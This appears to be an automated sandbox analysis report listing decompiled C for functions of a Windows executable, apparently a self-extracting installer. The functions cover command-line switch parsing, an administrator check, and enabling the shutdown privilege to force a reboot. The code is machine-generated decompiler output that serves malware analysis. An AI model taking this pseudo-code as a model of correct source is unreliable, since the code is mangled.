Opcode ID: fc134fc1f2cb2422e216742e90b08eafc446930be16382ebc2d5ea41c4948cbb
Instruction ID: 53ce838ff08f39e99e6a7679a53eecf704b1893564808e693ed5e799465d8398
Opcode Fuzzy Hash: fc134fc1f2cb2422e216742e90b08eafc446930be16382ebc2d5ea41c4948cbb
Instruction Fuzzy Hash: 56B0123304420CB7CB001BC3EC09F857F1ED7C4771F000000F71C050508A739410A7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00F34BC0, Relevance: 1.3, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F34BC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}

0x00f34bc8
0x00f34bcf

APIs

GlobalFree.KERNEL32 ref: 00F34BC8

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 617118682b59f18ce8ba9d748c74a524b94699e6c8dffcaf32bb52fd280d5b28
Instruction ID: 3b4f230c81c447d5121bc896effe40689d64db731c566fd420f54fb63321eb35
Opcode Fuzzy Hash: 617118682b59f18ce8ba9d748c74a524b94699e6c8dffcaf32bb52fd280d5b28
Instruction Fuzzy Hash: DDB0123100010CF78B011F53EC088453F1EE6C03707040010F40C410308B3298219581

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00F35B88, Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 421
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00F35B88(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t53;
				int _t56;
				CHAR* _t60;
				signed int _t63;
				void* _t67;
				char _t71;
				void* _t75;
				void* _t77;
				void* _t79;
				char _t80;
				intOrPtr _t81;
				void* _t93;
				intOrPtr _t94;
				CHAR* _t97;
				intOrPtr _t98;
				void* _t104;
				intOrPtr _t105;
				CHAR* _t106;
				void* _t109;
				void* _t110;
				void* _t114;
				intOrPtr _t115;
				CHAR* _t117;
				void* _t120;
				intOrPtr _t121;
				CHAR* _t130;
				void* _t133;
				signed int _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				void* _t139;
				CHAR* _t146;
				void* _t147;
				char _t151;
				char _t154;
				CHAR* _t155;
				int _t165;
				intOrPtr* _t171;
				intOrPtr* _t180;
				char* _t183;
				void* _t187;
				void* _t190;
				void* _t191;
				int _t194;
				void* _t195;
				void* _t197;
				void* _t198;
				char* _t203;
				char* _t204;
				signed int _t205;
				signed int _t207;

				_t53 =  *0xf38000; // 0xfdaca2c3
				_v8 = _t53 ^ _t205;
				_push(__ebx);
				_t146 = __ecx;
				_push(__esi);
				_t56 = 1;
				_push(__edi);
				_t194 = 1;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L129:
					_pop(_t195);
					_pop(_t197);
					_pop(_t147);
					return E00F36C20(_t56, _t147, _v8 ^ _t205, _t188, _t195, _t197);
				} else {
					L2:
					while(_t194 != 0) {
						_t60 =  *_t146;
						if(_t60 == 0x20 || _t60 == 9 || _t60 == 0xd || _t60 == 0xa || _t60 == 0xb || _t60 == 0xc) {
							_t146 = CharNextA(_t146);
							continue;
						}
						_v272 = _t146;
						if( *_t146 == 0) {
							break;
						} else {
							_t165 = 0;
							_t188 = 0;
							_t198 = 0;
							do {
								if(_t188 != 0) {
									if(_t198 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t60 =  *_t146;
									if(_t60 == 0x20 || _t60 == 9 || _t60 == 0xd || _t60 == 0xa || _t60 == 0xb || _t60 == 0xc) {
										break;
									} else {
										L21:
										_t60 =  *_t146;
										if(_t60 != 0x22) {
											if(_t165 >= 0x103) {
												goto L110;
											} else {
												 *(_t205 + _t165 - 0x108) = _t60;
												_t165 = _t165 + 1;
												_t146 =  &(_t146[1]);
												goto L31;
											}
										} else {
											_t3 =  &(_t146[1]); // 0x1
											_t60 = _t3;
											if( *_t60 == 0x22) {
												if(_t165 >= 0x103) {
													L110:
													_t56 = 0;
													goto L129;
												} else {
													 *(_t205 + _t165 - 0x108) = 0x22;
													_t165 = _t165 + 1;
													_t60 = 2;
													_t146 =  &(_t146[_t60]);
													L31:
													_v272 = _t146;
													goto L32;
												}
											} else {
												if(_t188 != 0) {
													_t198 = 1;
												} else {
													_t188 = _t188 + 1;
												}
												_t146 = _t60;
												_v272 = _t60;
												goto L32;
											}
										}
									}
								}
								goto L135;
								L32:
							} while ( *_t146 != 0);
							if(_t165 >= 0x104) {
								E00F36D85(_t60, _t146, _t165, _t188, _t194, _t198);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t205);
								_t206 = _t207;
								_t63 =  *0xf38000; // 0xfdaca2c3
								_v296 = _t63 ^ _t207;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t67 = E00F35849( &_v272, 0x4f0, _t194, 0x4f0); // executed
								} else {
									E00F34327(0, 0x4f0, _t66, _t66, 0x10, _t66);
									 *0xf39a88 = E00F3613C();
									_t67 = 0;
								}
								return E00F36C20(_t67, _t146, _v12 ^ _t206, 0x4f0, _t194, _t198);
							} else {
								 *(_t205 + _t165 - 0x108) = 0;
								if(_t188 == 0) {
									if(_t198 != 0) {
										goto L36;
									} else {
										goto L42;
									}
								} else {
									if(_t198 != 0) {
										L42:
										_t71 = _v268;
										if(_t71 == 0x2f || _t71 == 0x2d) {
											_t75 = CharUpperA(_v267) - 0x3f;
											if(_t75 == 0) {
												_t188 = 0x521;
												E00F34327(0, 0x521, 0xf31111, 0, 0x40, 0);
												_t77 =  *0xf385c8; // 0x0
												if(_t77 != 0) {
													CloseHandle(_t77);
												}
												ExitProcess(0);
											}
											_t79 = _t75 - 4;
											if(_t79 == 0) {
												_t80 = _v266;
												if(_t80 != 0) {
													if(_t80 != 0x3a) {
														goto L51;
													} else {
														_t151 = (0 | _v265 == 0x00000022) + 3;
														_t200 =  &_v268 + _t151;
														_t171 =  &_v268 + _t151;
														_t42 = _t171 + 1; // 0x1
														_t188 = _t42;
														do {
															_t81 =  *_t171;
															_t171 = _t171 + 1;
														} while (_t81 != 0);
														if(_t171 == _t188) {
															goto L104;
														} else {
															_t190 = 0x5b;
															if(E00F36494(_t200, _t190) == 0) {
																L119:
																_t191 = 0x5d;
																if(E00F36494(_t200, _t191) == 0) {
																	L121:
																	_t188 =  &_v276;
																	_v276 = _t151;
																	if(E00F35AFE(_t200,  &_v276) == 0) {
																		goto L104;
																	} else {
																		_t188 = 0x104;
																		E00F31485(0xf38b62, 0x104, _v276 + _t151 +  &_v268);
																		goto L123;
																	}
																} else {
																	_t188 = 0x5b;
																	if(E00F36494(_t200, _t188) == 0) {
																		goto L104;
																	} else {
																		goto L121;
																	}
																}
															} else {
																_t188 = 0x5d;
																if(E00F36494(_t200, _t188) == 0) {
																	goto L104;
																} else {
																	goto L119;
																}
															}
														}
													}
												} else {
													 *0xf38944 = 1;
												}
												goto L52;
											} else {
												_t93 = _t79 - 1;
												if(_t93 == 0) {
													L100:
													if(_v266 != 0x3a) {
														goto L51;
													} else {
														_t154 = (0 | _v265 == 0x00000022) + 3;
														_t202 =  &_v268 + _t154;
														_t180 =  &_v268 + _t154;
														_t30 = _t180 + 1; // 0x1
														_t188 = _t30;
														do {
															_t94 =  *_t180;
															_t180 = _t180 + 1;
														} while (_t94 != 0);
														if(_t180 != _t188) {
															_t188 =  &_v276;
															_v276 = _t154;
															if(E00F35AFE(_t202,  &_v276) == 0) {
																goto L104;
															} else {
																_t97 = CharUpperA(_v267);
																_t183 =  &_v268;
																_t98 = _v276;
																if(_t97 != 0x54) {
																	_t99 = _t98 + _t154;
																	_t155 = 0xf3895a;
																} else {
																	_t99 = _t98 + _t154;
																	_t155 = 0xf38a5e;
																}
																E00F31485(_t155, 0x104, _t99 + _t183);
																_t188 = 0x104;
																E00F364E7(_t155, 0x104, 0xf31111);
																if(E00F33086(_t155) != 0) {
																	goto L123;
																} else {
																	goto L110;
																}
															}
														} else {
															L104:
															_t146 = _v272;
															goto L51;
														}
													}
												} else {
													_t104 = _t93 - 0xa;
													if(_t104 == 0) {
														_t105 = _v266;
														if(_t105 != 0) {
															if(_t105 != 0x3a) {
																goto L51;
															} else {
																if(_v265 != 0) {
																	_t203 =  &_v265;
																	do {
																		_t106 =  *_t203;
																		_t203 = _t203 + 1;
																		_t109 = CharUpperA(_t106) - 0x45;
																		if(_t109 == 0) {
																			 *0xf3894c = 1;
																		} else {
																			_t187 = 2;
																			_t110 = _t109 - _t187;
																			if(_t110 == 0) {
																				 *0xf38950 = 1;
																			} else {
																				if(_t110 == 0xf) {
																					 *0xf38954 = 1;
																				} else {
																					_t194 = 0;
																				}
																			}
																		}
																	} while ( *_t203 != 0);
																	goto L123;
																}
															}
														} else {
															 *0xf3894c = 1;
														}
														goto L52;
													} else {
														_t114 = _t104 - 3;
														if(_t114 == 0) {
															_t115 = _v266;
															if(_t115 != 0) {
																if(_t115 != 0x3a) {
																	goto L51;
																} else {
																	_t117 = CharUpperA(_v265);
																	if(_t117 == 0x31) {
																		goto L78;
																	} else {
																		if(_t117 == 0x41) {
																			goto L79;
																		} else {
																			if(_t117 == 0x55) {
																				goto L78;
																			} else {
																				goto L51;
																			}
																		}
																	}
																}
															} else {
																L78:
																_push(2);
																_pop(1);
																L79:
																 *0xf38958 = 1;
															}
															goto L52;
														} else {
															_t120 = _t114 - 1;
															if(_t120 == 0) {
																_t121 = _v266;
																if(_t121 != 0) {
																	if(_t121 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L51;
																		}
																	} else {
																		 *0xf39a6c = 1;
																		if(_v265 != 0) {
																			_t204 =  &_v265;
																			do {
																				_t130 =  *_t204;
																				_t204 = _t204 + 1;
																				_t133 = CharUpperA(_t130) - 0x41;
																				if(_t133 == 0) {
																					_t134 = 2;
																					 *0xf39a6c =  *0xf39a6c | _t134;
																					goto L72;
																				} else {
																					_t135 = _t133 - 3;
																					if(_t135 == 0) {
																						 *0xf38c68 =  *0xf38c68 | 0x00000040;
																					} else {
																						_t136 = _t135 - 5;
																						if(_t136 == 0) {
																							 *0xf39a6c =  *0xf39a6c & 0xfffffffd;
																							goto L72;
																						} else {
																							_t137 = _t136 - 5;
																							if(_t137 == 0) {
																								 *0xf39a6c =  *0xf39a6c & 0xfffffffe;
																								goto L72;
																							} else {
																								_t139 = _t137;
																								if(_t139 == 0) {
																									 *0xf38c68 =  *0xf38c68 | 0x00000080;
																								} else {
																									if(_t139 == 3) {
																										 *0xf39a6c =  *0xf39a6c | 0x00000004;
																										L72:
																										 *0xf38948 = 1;
																									} else {
																										_t194 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																			} while ( *_t204 != 0);
																			L123:
																			_t146 = _v272;
																		}
																	}
																} else {
																	 *0xf39a6c = 3;
																	 *0xf38948 = 1;
																}
																goto L52;
															} else {
																if(_t120 == 0) {
																	goto L100;
																} else {
																	L51:
																	_t194 = 0;
																	L52:
																	if( *_t146 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L110;
										}
									} else {
										L36:
										_t194 = 0;
										break;
									}
								}
							}
						}
						goto L135;
					}
					if( *0xf3894c != 0 &&  *0xf38a5e == 0) {
						if(GetModuleFileNameA( *0xf39164, 0xf38a5e, 0x104) == 0) {
							_t194 = 0;
						} else {
							_t188 = 0x5c;
							 *((char*)(E00F365AF(0xf38a5e, _t188) + 1)) = 0;
						}
					}
					_t56 = _t194;
					goto L129;
				}
				L135:
			}

0x00f35b93
0x00f35b9a
0x00f35b9d
0x00f35ba0
0x00f35ba2
0x00f35ba3
0x00f35ba4
0x00f35ba5
0x00f35ba9
0x00f360b4
0x00f360b7
0x00f360b8
0x00f360bb
0x00f360c4
0x00f35bb8
0x00000000
0x00f35bb8
0x00f35bc0
0x00f35bc4
0x00f35be1
0x00000000
0x00f35be1
0x00f35be8
0x00f35bee
0x00000000
0x00f35bf4
0x00f35bf4
0x00f35bf6
0x00f35bf8
0x00f35bfa
0x00f35bfc
0x00f35c1c
0x00000000
0x00000000
0x00000000
0x00000000
0x00f35bfe
0x00f35bfe
0x00f35c02
0x00000000
0x00f35c18
0x00f35c1e
0x00f35c1e
0x00f35c22
0x00f35c64
0x00000000
0x00f35c6a
0x00f35c6a
0x00f35c71
0x00f35c72
0x00000000
0x00f35c72
0x00f35c24
0x00f35c24
0x00f35c24
0x00f35c2a
0x00f35c48
0x00f35fab
0x00f35fab
0x00000000
0x00f35c4e
0x00f35c50
0x00f35c58
0x00f35c59
0x00f35c5a
0x00f35c73
0x00f35c73
0x00000000
0x00f35c73
0x00f35c2c
0x00f35c2e
0x00f35c35
0x00f35c30
0x00f35c30
0x00f35c30
0x00f35c38
0x00f35c3a
0x00000000
0x00f35c3a
0x00f35c2a
0x00f35c22
0x00f35c02
0x00000000
0x00f35c79
0x00f35c79
0x00f35c88
0x00f360c5
0x00f360ca
0x00f360cb
0x00f360cc
0x00f360cd
0x00f360ce
0x00f360cf
0x00f360d2
0x00f360d3
0x00f360db
0x00f360e2
0x00f360f9
0x00f3611c
0x00f36124
0x00f360fb
0x00f36107
0x00f36111
0x00f36116
0x00f36116
0x00f36136
0x00f35c8e
0x00f35c8e
0x00f35c98
0x00f35cf0
0x00000000
0x00000000
0x00000000
0x00000000
0x00f35c9a
0x00f35c9c
0x00f35cf2
0x00f35cf2
0x00f35cfa
0x00f35d15
0x00f35d18
0x00f36084
0x00f36094
0x00f36099
0x00f360a0
0x00f360a3
0x00f360a3
0x00f360aa
0x00f360aa
0x00f35d1e
0x00f35d21
0x00f35fb2
0x00f35fba
0x00f35fcb
0x00000000
0x00f35fd1
0x00f35fe3
0x00f35fe6
0x00f35fe8
0x00f35fea
0x00f35fea
0x00f35fed
0x00f35fed
0x00f35fef
0x00f35ff0
0x00f35ff6
0x00000000
0x00f35ffc
0x00f35ffe
0x00f36008
0x00f3601c
0x00f3601e
0x00f36028
0x00f3603c
0x00f3603c
0x00f36042
0x00f36051
0x00000000
0x00f36057
0x00f36065
0x00f36072
0x00000000
0x00f36072
0x00f3602a
0x00f3602c
0x00f36036
0x00000000
0x00000000
0x00000000
0x00000000
0x00f36036
0x00f3600a
0x00f3600c
0x00f36016
0x00000000
0x00000000
0x00000000
0x00000000
0x00f36016
0x00f36008
0x00f35ff6
0x00f35fbc
0x00f35fbf
0x00f35fbf
0x00000000
0x00f35d27
0x00f35d27
0x00f35d28
0x00f35ef8
0x00f35eff
0x00000000
0x00f35f05
0x00f35f17
0x00f35f1a
0x00f35f1c
0x00f35f1e
0x00f35f1e
0x00f35f21
0x00f35f21
0x00f35f23
0x00f35f24
0x00f35f2a
0x00f35f37
0x00f35f3d
0x00f35f4c
0x00000000
0x00f35f4e
0x00f35f56
0x00f35f5e
0x00f35f64
0x00f35f6f
0x00f35f7a
0x00f35f7c
0x00f35f71
0x00f35f71
0x00f35f73
0x00f35f73
0x00f35f86
0x00f35f90
0x00f35f97
0x00f35fa5
0x00000000
0x00000000
0x00000000
0x00000000
0x00f35fa5
0x00f35f2c
0x00f35f2c
0x00f35f2c
0x00000000
0x00f35f2c
0x00f35f2a
0x00f35d2e
0x00f35d2e
0x00f35d31
0x00f35e80
0x00f35e88
0x00f35e99
0x00000000
0x00f35e9f
0x00f35ea6
0x00f35eae
0x00f35eb5
0x00f35eb5
0x00f35eb8
0x00f35ec3
0x00f35ec6
0x00f35ee8
0x00f35ec8
0x00f35eca
0x00f35ecb
0x00f35ecd
0x00f35ee0
0x00f35ecf
0x00f35ed2
0x00f35ed8
0x00f35ed4
0x00f35ed4
0x00f35ed4
0x00f35ed2
0x00f35ecd
0x00f35eee
0x00000000
0x00f35ef3
0x00f35ea6
0x00f35e8a
0x00f35e8d
0x00f35e8d
0x00000000
0x00f35d37
0x00f35d37
0x00f35d3a
0x00f35e3c
0x00f35e44
0x00f35e56
0x00000000
0x00f35e5c
0x00f35e64
0x00f35e6c
0x00000000
0x00f35e6e
0x00f35e70
0x00000000
0x00f35e72
0x00f35e74
0x00000000
0x00f35e76
0x00000000
0x00f35e76
0x00f35e74
0x00f35e70
0x00f35e6c
0x00f35e46
0x00f35e46
0x00f35e46
0x00f35e48
0x00f35e49
0x00f35e49
0x00f35e49
0x00000000
0x00f35d40
0x00f35d40
0x00f35d41
0x00f35d5b
0x00f35d63
0x00f35d7b
0x00f35e31
0x00000000
0x00f35e37
0x00f35d81
0x00f35d8b
0x00f35d90
0x00f35d94
0x00f35d9b
0x00f35d9b
0x00f35d9e
0x00f35da9
0x00f35dac
0x00f35dfc
0x00f35dfd
0x00000000
0x00f35dae
0x00f35dae
0x00f35db1
0x00f35df1
0x00f35db3
0x00f35db3
0x00f35db6
0x00f35de8
0x00000000
0x00f35db8
0x00f35db8
0x00f35dbb
0x00f35ddf
0x00000000
0x00f35dbd
0x00f35dbe
0x00f35dbf
0x00f35dd3
0x00f35dc1
0x00f35dc4
0x00f35dca
0x00f35e03
0x00f35e03
0x00f35dc6
0x00f35dc6
0x00f35dc6
0x00f35dc4
0x00f35dbf
0x00f35dbb
0x00f35db6
0x00f35db1
0x00f35e09
0x00f36077
0x00f36077
0x00f36077
0x00f35d90
0x00f35d65
0x00f35d67
0x00f35d72
0x00f35d72
0x00000000
0x00f35d43
0x00f35d45
0x00000000
0x00f35d4b
0x00f35d4b
0x00f35d4b
0x00f35d4d
0x00f35d50
0x00000000
0x00f35d56
0x00000000
0x00f35d56
0x00f35d50
0x00f35d45
0x00f35d41
0x00f35d3a
0x00f35d31
0x00f35d28
0x00000000
0x00000000
0x00000000
0x00f35c9e
0x00f35c9e
0x00f35c9e
0x00000000
0x00f35c9e
0x00f35c9c
0x00f35c98
0x00f35c88
0x00000000
0x00f35bee
0x00f35ca7
0x00f35cd2
0x00f360b0
0x00f35cd8
0x00f35cda
0x00f35ce5
0x00f35ce5
0x00f35cd2
0x00f360b2
0x00000000
0x00f360b2
0x00000000

APIs

CharNextA.USER32(?,00000000,?,?), ref: 00F35BDB
GetModuleFileNameA.KERNEL32(00F38A5E,00000104,00000000,?,?), ref: 00F35CCA
CharUpperA.USER32(?), ref: 00F35D0C
CharUpperA.USER32(00000001), ref: 00F35DA0
CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00F35E29
CharUpperA.USER32(?), ref: 00F35E64
CharUpperA.USER32(?), ref: 00F35EBA
CharUpperA.USER32(?), ref: 00F35F56
CloseHandle.KERNEL32(00000000,00F31111,00000000,00000040,00000000), ref: 00F360A3
ExitProcess.KERNEL32 ref: 00F360AA

Strings

", xrefs: 00F35C50
", xrefs: 00F35FD9
:, xrefs: 00F35EF8
RegServer, xrefs: 00F35E20

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
String ID: "$"$:$RegServer
API String ID: 1203814774-25366791
Opcode ID: 915e624bb999f733650ab6a0056b88f55fcf7e7403dd455e0b15740de97b845a
Instruction ID: 8029eea2576d8102d6f4c096533733cbdcb8c5fa75908f3e723c9cadcb271a23
Opcode Fuzzy Hash: 915e624bb999f733650ab6a0056b88f55fcf7e7403dd455e0b15740de97b845a
Instruction Fuzzy Hash: A2D16EB1D08B589ADF358B388C483B67B62ABD5F70F1440A5D8C2C7155DAB88EC2FB11

Uniqueness

Uniqueness Score: -1.00%

Function 00F31DC7, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00F31DC7(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0xf39a80 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0xf38000; // 0xfdaca2c3
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E00F34327(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E00F36C20(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E00F34327(0, 0x522, 0xf31111, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E00F31CD4(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

0x00f31dc7
0x00f31dc7
0x00f31dca
0x00f31dcf
0x00f31ddb
0x00f31dde
0x00f31dfc
0x00f31e04
0x00f31e12
0x00f31d17
0x00f31d1c
0x00f31d23
0x00f31d26
0x00f31d3e
0x00f31d60
0x00f31d6c
0x00f31d78
0x00f31d7f
0x00f31d8a
0x00f31d92
0x00f31d93
0x00f31d94
0x00f31da7
0x00f31db2
0x00f31da9
0x00f31da9
0x00000000
0x00f31da9
0x00f31d96
0x00f31d96
0x00000000
0x00f31d96
0x00f31d40
0x00f31d40
0x00f31d45
0x00f31d45
0x00f31d46
0x00f31d46
0x00f31d48
0x00f31d49
0x00f31d4c
0x00f31d51
0x00f31d51
0x00f31db8
0x00f31dc1
0x00f31e06
0x00f31e0a
0x00000000
0x00f31e0a
0x00f31de0
0x00f31deb
0x00f31df2
0x00f31dfa
0x00000000
0x00000000
0x00000000
0x00000000
0x00f31dfa
0x00f31dd1
0x00f31dd1
0x00f31dd9
0x00f31e10
0x00f31e11
0x00000000
0x00000000
0x00000000
0x00f31dd9

APIs

GetCurrentProcess.KERNEL32(00000028,?,00000000), ref: 00F31D2D
OpenProcessToken.ADVAPI32(00000000), ref: 00F31D34
ExitWindowsEx.USER32(00000002,00000000), ref: 00F31E0A

Strings

SeShutdownPrivilege, xrefs: 00F31D5A

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitOpenTokenWindows
String ID: SeShutdownPrivilege
API String ID: 2795981589-3733053543
Opcode ID: e4fe95c98706113fba19e31fd906768f9b9a05e52f1c1568f7b685180a8ebe8a
Instruction ID: 8bdae57282fef49752991a6204d42eb03b57e075038732597a1309925a532643
Opcode Fuzzy Hash: e4fe95c98706113fba19e31fd906768f9b9a05e52f1c1568f7b685180a8ebe8a
Instruction Fuzzy Hash: EE21DEB1B40209B7EB205B62DC4AFBF7679FB86771F104429FA06D6180DB759800B661

Uniqueness

Uniqueness Score: -1.00%

Function 00F315FC, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00F315FC(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				void* _v20;
				_Unknown_base(*)()* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0xf38000; // 0xfdaca2c3
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v24 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v20) != 0) {
							_t37 = _t39;
							 *0xf3a290(0, _v20, _v28);
							_v24();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v20);
						}
					}
					FreeLibrary(_t36);
				}
				return E00F36C20(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}

0x00f31604
0x00f3160b
0x00f31613
0x00f31619
0x00f3161b
0x00f31623
0x00f31626
0x00f3162e
0x00f31632
0x00f3163a
0x00f31640
0x00f31645
0x00f3165f
0x00f31662
0x00f3166b
0x00f31670
0x00f3167a
0x00f31680
0x00f31685
0x00f3168c
0x00f3168c
0x00f31691
0x00f31691
0x00f3166b
0x00f31698
0x00f31698
0x00f316b0

APIs

LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00F316F0), ref: 00F31628
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00F3163A
AllocateAndInitializeSid.ADVAPI32(00F316F0,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F316F0), ref: 00F31663
FreeSid.ADVAPI32(?,?,?,?,00F316F0), ref: 00F31691
FreeLibrary.KERNEL32(00000000,?,?,?,00F316F0), ref: 00F31698

Strings

advapi32.dll, xrefs: 00F3161E
CheckTokenMembership, xrefs: 00F31634

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary$AddressAllocateInitializeLoadProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4204503880-1888249752
Opcode ID: 030b32a4214625eee87653bf9b1258f02a57f191f2ed1d08459c068849aaa29c
Instruction ID: aca85e35fde023bcf9907b31563682c8bdf0bdd9004d8e82cae571e1c1fe93be
Opcode Fuzzy Hash: 030b32a4214625eee87653bf9b1258f02a57f191f2ed1d08459c068849aaa29c
Instruction Fuzzy Hash: 0911B971E0020DABDB049FA5DC4AABEBBB9FB49731F14006DF901E3250DA718D00EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F375A8, Relevance: 7.6, APIs: 5, Instructions: 53
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F375A8() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t35;
				signed int _t36;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0xf38000; // 0xfdaca2c3
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t35 = _v20 ^ _v24.LowPart;
					_t39 = _v8 ^ _t35;
					if(_t39 == 0xbb40e64e || ( *0xf38000 & 0xffff0000) == 0) {
						_t39 = 0xbb40e64f;
					}
					 *0xf38000 = _t39;
					 *0xf38004 =  !_t39;
					return _t35;
				} else {
					_t36 =  !_t23;
					 *0xf38004 = _t36;
					return _t36;
				}
			}

0x00f375b0
0x00f375b4
0x00f375b8
0x00f375cb
0x00f375de
0x00f375ea
0x00f375f3
0x00f375fc
0x00f3760d
0x00f37614
0x00f3761d
0x00f37623
0x00f37627
0x00f37631
0x00f37631
0x00f37636
0x00f3763e
0x00000000
0x00f375d1
0x00f375d1
0x00f375d3
0x00000000
0x00f375d3

APIs

